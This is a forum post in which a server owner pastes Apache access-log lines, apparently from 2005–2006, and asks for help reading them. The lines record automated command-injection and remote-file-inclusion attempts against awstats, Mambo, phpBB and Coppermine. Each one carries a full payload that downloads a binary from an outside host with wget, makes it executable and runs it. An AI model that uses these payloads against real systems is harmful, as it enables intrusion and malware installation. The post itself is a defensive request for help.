Oh, sorry for posting in the wrong spot.  I grep'd for wget in my access log and I do see a lot of suspicious behavior; it's a lot to go through though, maybe you guys can make more sense of it than me.  I'm not sure how awstats got on my system in the first place, is it added with another common package?

Anyway, here's what the grep results were, and a confirmation that I never installed that awstats:

[code:1:706a4abe43]/var/log/apache2 $ grep wget access_log 

195.28.196.79 - - [26/Dec/2005:23:40:18 -0800] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20209%2e136%2e48%2e69%2fmirela%3bchmod%20%2bx%20mirela%3b%2e%2fmirela;echo%20YYY;echo|  HTTP/1.1" 404 280

195.28.196.79 - - [26/Dec/2005:23:40:19 -0800] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20209%2e136%2e48%2e69%2fmirela%3bchmod%20%2bx%20mirela%3b%2e%2fmirela;echo%20YYY;echo|  HTTP/1.1" 404 280

195.28.196.79 - - [26/Dec/2005:23:40:21 -0800] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20209%2e136%2e48%2e69%2fmirela%3bchmod%20%2bx%20mirela%3b%2e%2fmirela;echo%20YYY;echo|  HTTP/1.1" 404 288

212.170.242.208 - - [03/Jan/2006:13:14:51 -0800] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20216%2e15%2e209%2e12%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo|  HTTP/1.1" 404 278

212.170.242.208 - - [03/Jan/2006:13:14:52 -0800] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20216%2e15%2e209%2e12%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo|  HTTP/1.1" 404 278

212.170.242.208 - - [03/Jan/2006:13:14:54 -0800] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20216%2e15%2e209%2e12%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo|  HTTP/1.1" 404 286

212.170.242.208 - - [03/Jan/2006:13:14:55 -0800] "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.12/listen;chmod%20744%20listen;./listen;echo%20YYY;echo|  HTTP/1.1" 404 270

212.170.242.208 - - [03/Jan/2006:13:14:56 -0800] "GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.12/listen;chmod%20744%20listen;./listen;echo%20YYY;echo|  HTTP/1.1" 404 269

212.170.242.208 - - [03/Jan/2006:13:14:58 -0800] "GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.12/listen;chmod%20744%20listen;./listen;echo%20YYY;echo|  HTTP/1.1" 404 276

212.170.242.208 - - [03/Jan/2006:13:14:59 -0800] "GET /cvs/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.12/listen;chmod%20744%20listen;./listen;echo%20YYY;echo|  HTTP/1.1" 404 274

212.170.242.208 - - [03/Jan/2006:13:15:00 -0800] "GET /cvs/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.12/listen;chmod%20744%20listen;./listen;echo%20YYY;echo|  HTTP/1.1" 404 280

62.175.253.180 - - [03/Jan/2006:16:31:03 -0800] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20209%2e136%2e48%2e69%2fmirela%3bchmod%20%2bx%20mirela%3b%2e%2fmirela;echo%20YYY;echo|  HTTP/1.1" 404 278

62.175.253.180 - - [03/Jan/2006:16:31:04 -0800] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20209%2e136%2e48%2e69%2fmirela%3bchmod%20%2bx%20mirela%3b%2e%2fmirela;echo%20YYY;echo|  HTTP/1.1" 404 278

62.175.253.180 - - [03/Jan/2006:16:31:05 -0800] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20209%2e136%2e48%2e69%2fmirela%3bchmod%20%2bx%20mirela%3b%2e%2fmirela;echo%20YYY;echo|  HTTP/1.1" 404 286

195.74.109.37 - - [04/Jan/2006:06:13:40 -0800] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20209%2e136%2e48%2e69%2fmirela%3bchmod%20%2bx%20mirela%3b%2e%2fmirela;echo%20YYY;echo|  HTTP/1.1" 404 278

195.74.109.37 - - [04/Jan/2006:06:13:41 -0800] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20209%2e136%2e48%2e69%2fmirela%3bchmod%20%2bx%20mirela%3b%2e%2fmirela;echo%20YYY;echo|  HTTP/1.1" 404 278

195.74.109.37 - - [04/Jan/2006:06:13:43 -0800] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20209%2e136%2e48%2e69%2fmirela%3bchmod%20%2bx%20mirela%3b%2e%2fmirela;echo%20YYY;echo|  HTTP/1.1" 404 286

195.223.166.68 - - [04/Jan/2006:12:06:26 -0800] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20209%2e136%2e48%2e69%2fmirela%3bchmod%20%2bx%20mirela%3b%2e%2fmirela;echo%20YYY;echo|  HTTP/1.1" 404 278

195.223.166.68 - - [04/Jan/2006:12:06:28 -0800] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20209%2e136%2e48%2e69%2fmirela%3bchmod%20%2bx%20mirela%3b%2e%2fmirela;echo%20YYY;echo|  HTTP/1.1" 404 278

195.223.166.68 - - [04/Jan/2006:12:06:29 -0800] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20209%2e136%2e48%2e69%2fmirela%3bchmod%20%2bx%20mirela%3b%2e%2fmirela;echo%20YYY;echo|  HTTP/1.1" 404 286

80.118.243.115 - - [05/Jan/2006:14:04:08 -0800] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20209%2e136%2e48%2e69%2fmirela%3bchmod%20%2bx%20mirela%3b%2e%2fmirela;echo%20YYY;echo|  HTTP/1.1" 404 278

80.118.243.115 - - [05/Jan/2006:14:04:10 -0800] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20209%2e136%2e48%2e69%2fmirela%3bchmod%20%2bx%20mirela%3b%2e%2fmirela;echo%20YYY;echo|  HTTP/1.1" 404 278

80.118.243.115 - - [05/Jan/2006:14:04:11 -0800] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20209%2e136%2e48%2e69%2fmirela%3bchmod%20%2bx%20mirela%3b%2e%2fmirela;echo%20YYY;echo|  HTTP/1.1" 404 286

132.248.204.65 - - [05/Jan/2006:18:16:38 -0800] "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.136.48.69/cmd.gif?&cmd=cd%20/tmp;wget%20209.136.48.69/micu;chmod%20744%20micu;./micu;echo%20YYY;echo|  HTTP\x01.1" 404 270

132.248.204.65 - - [05/Jan/2006:18:16:39 -0800] "GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.136.48.69/cmd.gif?&cmd=cd%20/tmp;wget%20209.136.48.69/micu;chmod%20744%20micu;./micu;echo%20YYY;echo|  HTTP\x01.1" 404 269

132.248.204.65 - - [05/Jan/2006:18:16:40 -0800] "GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.136.48.69/cmd.gif?&cmd=cd%20/tmp;wget%20209.136.48.69/micu;chmod%20744%20micu;./micu;echo%20YYY;echo|  HTTP\x01.1" 404 276

132.248.204.65 - - [05/Jan/2006:18:16:41 -0800] "GET /cvs/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.136.48.69/cmd.gif?&cmd=cd%20/tmp;wget%20209.136.48.69/micu;chmod%20744%20micu;./micu;echo%20YYY;echo|  HTTP\x01.1" 404 274

132.248.204.65 - - [05/Jan/2006:18:16:42 -0800] "GET /cvs/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.136.48.69/cmd.gif?&cmd=cd%20/tmp;wget%20209.136.48.69/micu;chmod%20744%20micu;./micu;echo%20YYY;echo|  HTTP\x01.1" 404 280

132.248.204.65 - - [05/Jan/2006:18:16:43 -0800] "GET /php/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.136.48.69/cmd.gif?&cmd=cd%20/tmp;wget%20209.136.48.69/micu;chmod%20744%20micu;./micu;echo%20YYY;echo|  HTTP\x01.1" 404 280

209.20.37.196 - - [06/Jan/2006:00:24:59 -0800] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20128%2e173%2e40%2e113%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo|  HTTP/1.1" 404 278

209.20.37.196 - - [06/Jan/2006:00:25:00 -0800] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20128%2e173%2e40%2e113%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo|  HTTP/1.1" 404 278

209.20.37.196 - - [06/Jan/2006:00:25:01 -0800] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20128%2e173%2e40%2e113%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo|  HTTP/1.1" 404 286

209.20.37.196 - - [06/Jan/2006:00:25:02 -0800] "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20128.173.40.113/listen;chmod%20744%20listen;./listen;echo%20YYY;echo|  HTTP/1.1" 404 270

209.20.37.196 - - [06/Jan/2006:00:25:03 -0800] "GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20128.173.40.113/listen;chmod%20744%20listen;./listen;echo%20YYY;echo|  HTTP/1.1" 404 269

209.20.37.196 - - [06/Jan/2006:00:25:05 -0800] "GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20128.173.40.113/listen;chmod%20744%20listen;./listen;echo%20YYY;echo|  HTTP/1.1" 404 276

209.20.37.196 - - [06/Jan/2006:00:25:06 -0800] "GET /cvs/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20128.173.40.113/listen;chmod%20744%20listen;./listen;echo%20YYY;echo|  HTTP/1.1" 404 280

203.197.246.6 - - [06/Jan/2006:09:18:39 -0800] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20209%2e136%2e48%2e69%2fmirela%3bchmod%20%2bx%20mirela%3b%2e%2fmirela;echo%20YYY;echo|  HTTP/1.1" 404 278

203.197.246.6 - - [06/Jan/2006:09:18:40 -0800] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20209%2e136%2e48%2e69%2fmirela%3bchmod%20%2bx%20mirela%3b%2e%2fmirela;echo%20YYY;echo|  HTTP/1.1" 404 278

203.197.246.6 - - [06/Jan/2006:09:18:43 -0800] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20209%2e136%2e48%2e69%2fmirela%3bchmod%20%2bx%20mirela%3b%2e%2fmirela;echo%20YYY;echo|  HTTP/1.1" 404 286

218.188.21.87 - - [08/Jan/2006:09:27:13 -0800] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20212%2e159%2e69%2e87%2fkillos%3bchmod%20%2bx%20killos%3b%2e%2flisten;echo%20YYY;echo|  HTTP/1.1" 404 278

218.188.21.87 - - [08/Jan/2006:09:27:14 -0800] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20212%2e159%2e69%2e87%2fkillos%3bchmod%20%2bx%20killos%3b%2e%2flisten;echo%20YYY;echo|  HTTP/1.1" 404 278

218.188.21.87 - - [08/Jan/2006:09:27:16 -0800] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20212%2e159%2e69%2e87%2fkillos%3bchmod%20%2bx%20killos%3b%2e%2flisten;echo%20YYY;echo|  HTTP/1.1" 404 286

150.164.65.10 - - [08/Jan/2006:18:49:25 -0800] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20212%2e159%2e69%2e87%2fkillos%3bchmod%20%2bx%20killos%3b%2e%2flisten;echo%20YYY;echo|  HTTP/1.1" 404 278

150.164.65.10 - - [08/Jan/2006:18:49:26 -0800] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20212%2e159%2e69%2e87%2fkillos%3bchmod%20%2bx%20killos%3b%2e%2flisten;echo%20YYY;echo|  HTTP/1.1" 404 278

150.164.65.10 - - [08/Jan/2006:18:49:27 -0800] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20212%2e159%2e69%2e87%2fkillos%3bchmod%20%2bx%20killos%3b%2e%2flisten;echo%20YYY;echo|  HTTP/1.1" 404 286

216.68.232.25 - - [09/Jan/2006:00:37:51 -0800] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2072%2e136%2e74%2e248%2fkilloz%3bchmod%20%2bx%20killoz%3b%2e%2fkilloz;echo%20YYY;echo|  HTTP/1.1" 404 278

216.68.232.25 - - [09/Jan/2006:00:37:52 -0800] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2072%2e136%2e74%2e248%2fkilloz%3bchmod%20%2bx%20killoz%3b%2e%2fkilloz;echo%20YYY;echo|  HTTP/1.1" 404 278

216.68.232.25 - - [09/Jan/2006:00:37:53 -0800] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2072%2e136%2e74%2e248%2fkilloz%3bchmod%20%2bx%20killoz%3b%2e%2fkilloz;echo%20YYY;echo|  HTTP/1.1" 404 286

61.81.166.92 - - [09/Jan/2006:02:39:09 -0800] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2072%2e136%2e74%2e248%2fkilloz%3bchmod%20%2bx%20killoz%3b%2e%2fkilloz;echo%20YYY;echo|  HTTP/1.1" 404 278

61.81.166.92 - - [09/Jan/2006:02:39:10 -0800] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2072%2e136%2e74%2e248%2fkilloz%3bchmod%20%2bx%20killoz%3b%2e%2fkilloz;echo%20YYY;echo|  HTTP/1.1" 404 278

61.81.166.92 - - [09/Jan/2006:02:39:11 -0800] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2072%2e136%2e74%2e248%2fkilloz%3bchmod%20%2bx%20killoz%3b%2e%2fkilloz;echo%20YYY;echo|  HTTP/1.1" 404 286

203.158.54.63 - - [09/Jan/2006:03:58:29 -0800] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20212%2e159%2e69%2e87%2fkillos%3bchmod%20%2bx%20killos%3b%2e%2flisten;echo%20YYY;echo|  HTTP/1.1" 404 278

203.158.54.63 - - [09/Jan/2006:03:58:31 -0800] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20212%2e159%2e69%2e87%2fkillos%3bchmod%20%2bx%20killos%3b%2e%2flisten;echo%20YYY;echo|  HTTP/1.1" 404 278

203.158.54.63 - - [09/Jan/2006:03:58:32 -0800] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20212%2e159%2e69%2e87%2fkillos%3bchmod%20%2bx%20killos%3b%2e%2flisten;echo%20YYY;echo|  HTTP/1.1" 404 286

65.125.52.66 - - [09/Jan/2006:05:38:48 -0800] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2072%2e136%2e74%2e248%2fkilloz%3bchmod%20%2bx%20killoz%3b%2e%2fkilloz;echo%20YYY;echo|  HTTP/1.1" 404 278

65.125.52.66 - - [09/Jan/2006:05:38:49 -0800] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2072%2e136%2e74%2e248%2fkilloz%3bchmod%20%2bx%20killoz%3b%2e%2fkilloz;echo%20YYY;echo|  HTTP/1.1" 404 278

65.125.52.66 - - [09/Jan/2006:05:38:50 -0800] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2072%2e136%2e74%2e248%2fkilloz%3bchmod%20%2bx%20killoz%3b%2e%2fkilloz;echo%20YYY;echo|  HTTP/1.1" 404 286

69.28.238.138 - - [09/Jan/2006:12:19:09 -0800] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20209%2e136%2e48%2e69%2fmirela%3bchmod%20%2bx%20mirela%3b%2e%2fmirela;echo%20YYY;echo|  HTTP/1.1" 404 278

69.28.238.138 - - [09/Jan/2006:12:19:10 -0800] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20209%2e136%2e48%2e69%2fmirela%3bchmod%20%2bx%20mirela%3b%2e%2fmirela;echo%20YYY;echo|  HTTP/1.1" 404 278

69.28.238.138 - - [09/Jan/2006:12:19:11 -0800] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20209%2e136%2e48%2e69%2fmirela%3bchmod%20%2bx%20mirela%3b%2e%2fmirela;echo%20YYY;echo|  HTTP/1.1" 404 286

218.75.53.66 - - [09/Jan/2006:20:37:12 -0800] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20216%2e15%2e209%2e12%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo|  HTTP/1.1" 404 278

218.75.53.66 - - [09/Jan/2006:20:37:14 -0800] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20216%2e15%2e209%2e12%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo|  HTTP/1.1" 404 278

218.75.53.66 - - [09/Jan/2006:20:37:15 -0800] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20216%2e15%2e209%2e12%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo|  HTTP/1.1" 404 286

218.75.53.66 - - [09/Jan/2006:20:37:16 -0800] "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.12/listen;chmod%20744%20listen;./listen;echo%20YYY;echo|  HTTP/1.1" 404 270

218.75.53.66 - - [09/Jan/2006:20:37:19 -0800] "GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.12/listen;chmod%20744%20listen;./listen;echo%20YYY;echo|  HTTP/1.1" 404 269

218.75.53.66 - - [09/Jan/2006:20:37:19 -0800] "GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.12/listen;chmod%20744%20listen;./listen;echo%20YYY;echo|  HTTP/1.1" 404 276

218.75.53.66 - - [09/Jan/2006:20:37:21 -0800] "GET /cvs/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.12/listen;chmod%20744%20listen;./listen;echo%20YYY;echo|  HTTP/1.1" 404 274

218.75.53.66 - - [09/Jan/2006:20:37:22 -0800] "GET /cvs/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.12/listen;chmod%20744%20listen;./listen;echo%20YYY;echo|  HTTP/1.1" 404 280

212.68.203.234 - - [10/Jan/2006:04:31:03 -0800] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2072%2e136%2e74%2e248%2fkilloz%3bchmod%20%2bx%20killoz%3b%2e%2fkilloz;echo%20YYY;echo|  HTTP/1.1" 404 278

212.68.203.234 - - [10/Jan/2006:04:31:04 -0800] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2072%2e136%2e74%2e248%2fkilloz%3bchmod%20%2bx%20killoz%3b%2e%2fkilloz;echo%20YYY;echo|  HTTP/1.1" 404 278

212.68.203.234 - - [10/Jan/2006:04:31:05 -0800] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2072%2e136%2e74%2e248%2fkilloz%3bchmod%20%2bx%20killoz%3b%2e%2fkilloz;echo%20YYY;echo|  HTTP/1.1" 404 286

85.37.240.241 - - [10/Jan/2006:07:37:20 -0800] "GET /modules/Forums/admin/admin_styles.php?phpbb_root_path=http://209.136.48.69/cmd.dat?&cmd=cd%20/tmp;wget%20209.136.48.69/cbac;chmod%20744%20cbac;./cbac;echo%20YYY;echo|  HTTP/1.1" 404 297

85.37.240.241 - - [10/Jan/2006:07:37:25 -0800] "GET /modules/Forums/admin/admin_styles.phpadmin_styles.php?phpbb_root_path=http://209.136.48.69/cmd.dat?&cmd=cd%20/tmp;wget%20209.136.48.69/cbac;chmod%20744%20cbac;./cbac;echo%20YYY;echo|  HTTP/1.1" 404 313

85.37.240.241 - - [10/Jan/2006:07:37:26 -0800] "GET /admin_styles.phpadmin_styles.php?phpbb_root_path=http://209.136.48.69/cmd.dat?&cmd=cd%20/tmp;wget%20209.136.48.69/cbac;chmod%20744%20cbac;./cbac;echo%20YYY;echo|  HTTP/1.1" 404 292

85.37.240.241 - - [10/Jan/2006:07:37:28 -0800] "GET /Forums/admin/admin_styles.php?phpbb_root_path=http://209.136.48.69/cmd.dat?&cmd=cd%20/tmp;wget%20209.136.48.69/cbac;chmod%20744%20cbac;./cbac;echo%20YYY;echo|  HTTP/1.1" 404 289

85.37.240.241 - - [10/Jan/2006:07:37:29 -0800] "GET /modules/coppermine/themes/default/theme.php?THEME_DIR=http://209.136.48.69/cmd.gif?&cmd=cd%20/tmp;wget%20209.136.48.69/cbac;chmod%20744%20cbac;./cbac;echo%20YYY;echo|  HTTP/1.1" 404 303

85.37.240.241 - - [10/Jan/2006:07:37:30 -0800] "GET /modules/coppermine/themes/default/theme.phptheme.php?THEME_DIR=http://209.136.48.69/cmd.gif?&cmd=cd%20/tmp;wget%20209.136.48.69/cbac;chmod%20744%20cbac;./cbac;echo%20YYY;echo|  HTTP/1.1" 404 312

24.34.78.105 - - [14/Jan/2006:19:23:11 -0800] "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://200.72.130.29/cmd.gif?&cmd=cd%20/tmp;wget%20212.203.97.120/sexy;chmod%20744%20sexy;./sexy%20200.60.149.19%208080;00;echo%20YYY;echo|  HTTP/1.1" 404 270

24.34.78.105 - - [14/Jan/2006:19:23:12 -0800] "GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://200.72.130.29/cmd.gif?&cmd=cd%20/tmp;wget%20212.203.97.120/sexy;chmod%20744%20sexy;./sexy%20200.60.149.19%208080;00;echo%20YYY;echo|  HTTP/1.1" 404 269

24.34.78.105 - - [14/Jan/2006:19:23:14 -0800] "GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://200.72.130.29/cmd.gif?&cmd=cd%20/tmp;wget%20212.203.97.120/sexy;chmod%20744%20sexy;./sexy%20200.60.149.19%208080;00;echo%20YYY;echo|  HTTP/1.1" 404 276

24.34.78.105 - - [14/Jan/2006:19:23:19 -0800] "GET /cvs/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://200.72.130.29/cmd.gif?&cmd=cd%20/tmp;wget%20212.203.97.120/sexy;chmod%20744%20sexy;./sexy%20200.60.149.19%208080;00;echo%20YYY;echo|  HTTP/1.1" 404 274

61.66.208.16 - - [15/Jan/2006:02:35:04 -0800] "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://200.72.130.29/cmd.gif?&cmd=cd%20/tmp;wget%20200.207.91.25/bash;chmod%20744%20bash;./bash;0209.61.187.106%208080;08080;0;echo%20YYY;echo|  HTTP/1.1" 404 270

61.66.208.16 - - [15/Jan/2006:02:35:05 -0800] "GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://200.72.130.29/cmd.gif?&cmd=cd%20/tmp;wget%20200.207.91.25/bash;chmod%20744%20bash;./bash;0209.61.187.106%208080;08080;0;echo%20YYY;echo|  HTTP/1.1" 404 269

61.66.208.16 - - [15/Jan/2006:02:35:06 -0800] "GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://200.72.130.29/cmd.gif?&cmd=cd%20/tmp;wget%20200.207.91.25/bash;chmod%20744%20bash;./bash;0209.61.187.106%208080;08080;0;echo%20YYY;echo|  HTTP/1.1" 404 276

61.66.208.16 - - [15/Jan/2006:02:35:08 -0800] "GET /cvs/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://200.72.130.29/cmd.gif?&cmd=cd%20/tmp;wget%20200.207.91.25/bash;chmod%20744%20bash;./bash;0209.61.187.106%208080;08080;0;echo%20YYY;echo|  HTTP/1.1" 404 274

209.206.228.15 - - [15/Jan/2006:06:09:22 -0800] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo|  HTTP/1.1" 404 278

209.206.228.15 - - [15/Jan/2006:06:09:23 -0800] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo|  HTTP/1.1" 404 278

